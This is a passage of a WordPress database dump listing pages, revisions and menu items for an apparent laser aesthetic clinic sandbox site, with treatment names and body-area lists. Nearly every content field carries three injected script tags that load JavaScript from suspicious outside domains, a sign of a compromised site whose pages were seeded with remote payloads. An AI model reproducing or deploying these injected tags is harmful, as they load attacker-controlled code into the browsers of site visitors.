type=\'text/javascript\'></script>','Clear Acne Laser','','publish','closed','closed','','aesthetic-solutions-4-9','','','2018-01-03 03:47:22','2018-01-03 03:47:22','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6459',0,'page','',0),(6460,1,'2018-01-03 03:47:22','2018-01-03 03:47:22','Clear Acne Laser<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Clear Acne Laser','','inherit','closed','closed','','6459-revision-v1','','','2018-01-03 03:47:22','2018-01-03 03:47:22','',6459,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6459-revision-v1/',0,'revision','',0),(6461,1,'2018-01-03 03:47:45','2018-01-03 03:47:45',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6461','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6461',39,'nav_menu_item','',0),(6462,1,'2018-01-03 03:49:38','2018-01-03 03:49:38','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nRosacea Laser\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Rosacea Laser','','publish','closed','closed','','aesthetic-solutions-4-10','','','2018-01-03 03:49:38','2018-01-03 03:49:38','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6462',0,'page','',0),(6463,1,'2018-01-03 03:49:38','2018-01-03 03:49:38','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nRosacea Laser\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Rosacea Laser','','inherit','closed','closed','','6462-revision-v1','','','2018-01-03 03:49:38','2018-01-03 03:49:38','',6462,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6462-revision-v1/',0,'revision','',0),(6464,1,'2018-01-03 03:53:25','2018-01-03 03:53:25',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6464','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6464',40,'nav_menu_item','',0),(6465,1,'2018-01-03 03:54:06','2018-01-03 03:54:06','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nAcne Scar Laser\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Acne Scar Laser','','publish','closed','closed','','aesthetic-solutions-4-11','','','2018-01-03 03:54:06','2018-01-03 03:54:06','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6465',0,'page','',0),(6466,1,'2018-01-03 03:54:06','2018-01-03 03:54:06','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nAcne Scar Laser\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Acne Scar Laser','','inherit','closed','closed','','6465-revision-v1','','','2018-01-03 03:54:06','2018-01-03 03:54:06','',6465,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6465-revision-v1/',0,'revision','',0),(6467,1,'2018-01-03 03:54:34','2018-01-03 03:54:34',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6467','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6467',41,'nav_menu_item','',0),(6468,1,'2018-01-03 03:57:27','2018-01-03 03:57:27','Neck and Decollete\r\n\r\nUnder Arms<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Acne Scar Resurface Laser - Full Face','','publish','closed','closed','','aesthetic-solutions-4-12','','','2018-01-03 03:57:27','2018-01-03 03:57:27','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6468',0,'page','',0),(6469,1,'2018-01-03 03:57:27','2018-01-03 03:57:27','Neck and Decollete\r\n\r\nUnder Arms<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Acne Scar Resurface Laser - Full Face','','inherit','closed','closed','','6468-revision-v1','','','2018-01-03 03:57:27','2018-01-03 03:57:27','',6468,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6468-revision-v1/',0,'revision','',0),(6470,1,'2018-01-03 03:57:52','2018-01-03 03:57:52','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Acne Scar Resurface Laser – Full Face','','publish','closed','closed','','acne-scar-resurface-laser-full-face','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6470',42,'nav_menu_item','',0),(6471,1,'2018-01-03 03:59:28','2018-01-03 03:59:28','Brightening Laser – Dark Eyes Circle<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Brightening Laser Dark Eyes Circle','','publish','closed','closed','','aesthetic-solutions-4-13','','','2018-01-03 03:59:28','2018-01-03 03:59:28','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6471',0,'page','',0),(6472,1,'2018-01-03 03:59:28','2018-01-03 03:59:28','Brightening Laser – Dark Eyes Circle<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Brightening Laser Dark Eyes Circle','','inherit','closed','closed','','6471-revision-v1','','','2018-01-03 03:59:28','2018-01-03 03:59:28','',6471,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6471-revision-v1/',0,'revision','',0),(6473,1,'2018-01-03 03:59:55','2018-01-03 03:59:55',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6473','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6473',43,'nav_menu_item','',0),(6474,1,'2018-01-03 04:01:06','2018-01-03 04:01:06','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nBrightening Laser – Full Face\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Brightening Laser - Full Face','','publish','closed','closed','','aesthetic-solutions-4-14','','','2018-01-03 04:01:06','2018-01-03 04:01:06','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6474',0,'page','',0),(6475,1,'2018-01-03 04:01:06','2018-01-03 04:01:06','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nBrightening Laser – Full Face\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Brightening Laser - Full Face','','inherit','closed','closed','','6474-revision-v1','','','2018-01-03 04:01:06','2018-01-03 04:01:06','',6474,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6474-revision-v1/',0,'revision','',0),(6476,1,'2018-01-03 04:01:30','2018-01-03 04:01:30','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Brightening Laser – Full Face','','publish','closed','closed','','brightening-laser-full-face','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6476',44,'nav_menu_item','',0),(6477,1,'2018-01-03 04:02:25','2018-01-03 04:02:25','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nInsta Glow Laser\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Insta Glow Laser','','publish','closed','closed','','aesthetic-solutions-4-15','','','2018-01-03 04:02:25','2018-01-03 04:02:25','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6477',0,'page','',0),(6478,1,'2018-01-03 04:02:25','2018-01-03 04:02:25','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nInsta Glow Laser\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Insta Glow Laser','','inherit','closed','closed','','6477-revision-v1','','','2018-01-03 04:02:25','2018-01-03 04:02:25','',6477,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6477-revision-v1/',0,'revision','',0),(6479,1,'2018-01-03 04:02:51','2018-01-03 04:02:51',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6479','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6479',45,'nav_menu_item','',0),(6480,1,'2018-01-03 04:04:10','2018-01-03 04:04:10','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nWarts, Moles, Age Spots, ETC\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Clear Spot Laser','','publish','closed','closed','','aesthetic-solutions-4-16','','','2018-01-03 04:04:10','2018-01-03 04:04:10','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6480',0,'page','',0),(6481,1,'2018-01-03 04:04:10','2018-01-03 04:04:10','<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nWarts, Moles, Age Spots, ETC\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\"></div>\r\n</div>\r\n</div><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Clear Spot Laser','','inherit','closed','closed','','6480-revision-v1','','','2018-01-03 04:04:10','2018-01-03 04:04:10','',6480,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6480-revision-v1/',0,'revision','',0),(6482,1,'2018-01-03 04:04:30','0000-00-00 00:00:00',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','draft','closed','closed','','','','','2018-01-03 04:04:30','0000-00-00 00:00:00','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6482',1,'nav_menu_item','',0),(6483,1,'2018-01-03 04:06:46','2018-01-03 04:06:46',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6483','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6483',46,'nav_menu_item','',0),(6484,1,'2018-01-03 04:07:46','2018-01-03 04:07:46','<strong>FACE AREA</strong>\r\n<ol>\r\n 	<li>Full Face</li>\r\n 	<li>Forehead</li>\r\n 	<li>Cheek</li>\r\n 	<li>Upper Lip</li>\r\n 	<li>Chin</li>\r\n 	<li>Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Face Area','','publish','closed','closed','','aesthetic-solutions-5-2','','','2018-01-03 04:07:46','2018-01-03 04:07:46','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6484',0,'page','',0),(6485,1,'2018-01-03 04:07:46','2018-01-03 04:07:46','<strong>FACE AREA</strong>\r\n<ol>\r\n 	<li>Full Face</li>\r\n 	<li>Forehead</li>\r\n 	<li>Cheek</li>\r\n 	<li>Upper Lip</li>\r\n 	<li>Chin</li>\r\n 	<li>Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Face Area','','inherit','closed','closed','','6484-revision-v1','','','2018-01-03 04:07:46','2018-01-03 04:07:46','',6484,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6484-revision-v1/',0,'revision','',0),(6486,1,'2018-01-03 04:08:13','2018-01-03 04:08:13',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6486','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6486',48,'nav_menu_item','',0),(6487,1,'2018-01-03 04:09:05','2018-01-03 04:09:05','<strong>ARMS AREA</strong>\r\n<ol>\r\n 	<li>Half Arms</li>\r\n 	<li>Full Arms</li>\r\n 	<li>Finger</li>\r\n 	<li>Under Arms           Hair Removal + Brightening</li>\r\n 	<li>Under Arms           Brightening only</li>\r\n 	<li>Under Arms           HR Bright</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Arms Area','','publish','closed','closed','','aesthetic-solutions-5-3','','','2018-01-03 04:09:05','2018-01-03 04:09:05','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6487',0,'page','',0),(6488,1,'2018-01-03 04:09:05','2018-01-03 04:09:05','<strong>ARMS AREA</strong>\r\n<ol>\r\n 	<li>Half Arms</li>\r\n 	<li>Full Arms</li>\r\n 	<li>Finger</li>\r\n 	<li>Under Arms           Hair Removal + Brightening</li>\r\n 	<li>Under Arms           Brightening only</li>\r\n 	<li>Under Arms           HR Bright</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Arms Area','','inherit','closed','closed','','6487-revision-v1','','','2018-01-03 04:09:05','2018-01-03 04:09:05','',6487,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6487-revision-v1/',0,'revision','',0),(6489,1,'2018-01-03 04:09:34','2018-01-03 04:09:34',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6489','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6489',49,'nav_menu_item','',0),(6490,1,'2018-01-03 04:10:17','2018-01-03 04:10:17','<strong>CHEST AREA</strong>\r\n<ol>\r\n 	<li>Half Chest</li>\r\n 	<li>Full Chest</li>\r\n 	<li>Navel Area</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Chest Area','','publish','closed','closed','','aesthetic-solutions-5-4','','','2018-01-03 04:10:17','2018-01-03 04:10:17','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6490',0,'page','',0),(6491,1,'2018-01-03 04:10:17','2018-01-03 04:10:17','<strong>CHEST AREA</strong>\r\n<ol>\r\n 	<li>Half Chest</li>\r\n 	<li>Full Chest</li>\r\n 	<li>Navel Area</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Chest Area','','inherit','closed','closed','','6490-revision-v1','','','2018-01-03 04:10:17','2018-01-03 04:10:17','',6490,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6490-revision-v1/',0,'revision','',0),(6492,1,'2018-01-03 04:10:45','2018-01-03 04:10:45',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6492','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6492',50,'nav_menu_item','',0),(6493,1,'2018-01-03 04:12:01','2018-01-03 04:12:01','<strong>BACK AREA</strong>\r\n<ol>\r\n 	<li>Half Back</li>\r\n 	<li>Full Back</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Back Area','','publish','closed','closed','','aesthetic-solutions-5-5','','','2018-01-03 04:12:01','2018-01-03 04:12:01','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6493',0,'page','',0),(6494,1,'2018-01-03 04:12:01','2018-01-03 04:12:01','<strong>BACK AREA</strong>\r\n<ol>\r\n 	<li>Half Back</li>\r\n 	<li>Full Back</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Back Area','','inherit','closed','closed','','6493-revision-v1','','','2018-01-03 04:12:01','2018-01-03 04:12:01','',6493,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6493-revision-v1/',0,'revision','',0),(6495,1,'2018-01-03 04:13:22','2018-01-03 04:13:22',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6495','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6495',51,'nav_menu_item','',0),(6496,1,'2018-01-03 04:14:11','2018-01-03 04:14:11','<strong>V AREA</strong>\r\n<ol>\r\n 	<li>Bikini Line        Hair Removal Only</li>\r\n 	<li>Bikini Line        Brightening Only</li>\r\n 	<li>Bikini Line        HR Bright</li>\r\n 	<li>Brazilian           Hair Removal Only</li>\r\n 	<li>Brazilian           Brightening Only</li>\r\n 	<li>Brazilian           HR Bright</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','V Area','','publish','closed','closed','','aesthetic-solutions-5-6','','','2018-01-03 04:14:11','2018-01-03 04:14:11','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6496',0,'page','',0),(6497,1,'2018-01-03 04:14:11','2018-01-03 04:14:11','<strong>V AREA</strong>\r\n<ol>\r\n 	<li>Bikini Line        Hair Removal Only</li>\r\n 	<li>Bikini Line        Brightening Only</li>\r\n 	<li>Bikini Line        HR Bright</li>\r\n 	<li>Brazilian           Hair Removal Only</li>\r\n 	<li>Brazilian           Brightening Only</li>\r\n 	<li>Brazilian           HR Bright</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','V Area','','inherit','closed','closed','','6496-revision-v1','','','2018-01-03 04:14:11','2018-01-03 04:14:11','',6496,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6496-revision-v1/',0,'revision','',0),(6498,1,'2018-01-03 04:14:43','2018-01-03 04:14:43',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6498','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6498',52,'nav_menu_item','',0),(6499,1,'2018-01-03 04:15:27','2018-01-03 04:15:27','<strong>LEG AREA</strong>\r\n<ol>\r\n 	<li>Half Leg</li>\r\n 	<li>Full Leg</li>\r\n 	<li>Toes</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Leg Area','','publish','closed','closed','','aesthetic-solutions-5-7','','','2018-01-03 04:15:27','2018-01-03 04:15:27','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6499',0,'page','',0),(6500,1,'2018-01-03 04:15:27','2018-01-03 04:15:27','<strong>LEG AREA</strong>\r\n<ol>\r\n 	<li>Half Leg</li>\r\n 	<li>Full Leg</li>\r\n 	<li>Toes</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Leg Area','','inherit','closed','closed','','6499-revision-v1','','','2018-01-03 04:15:27','2018-01-03 04:15:27','',6499,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6499-revision-v1/',0,'revision','',0),(6501,1,'2018-01-03 04:15:54','2018-01-03 04:15:54',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6501','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6501',53,'nav_menu_item','',0),(6502,1,'2018-01-03 04:17:21','2018-01-03 04:17:21','<ol>\r\n 	<li>Tummy</li>\r\n 	<li>Tights</li>\r\n 	<li>Upperarms</li>\r\n 	<li>Back Body</li>\r\n 	<li>Lower Back</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Body 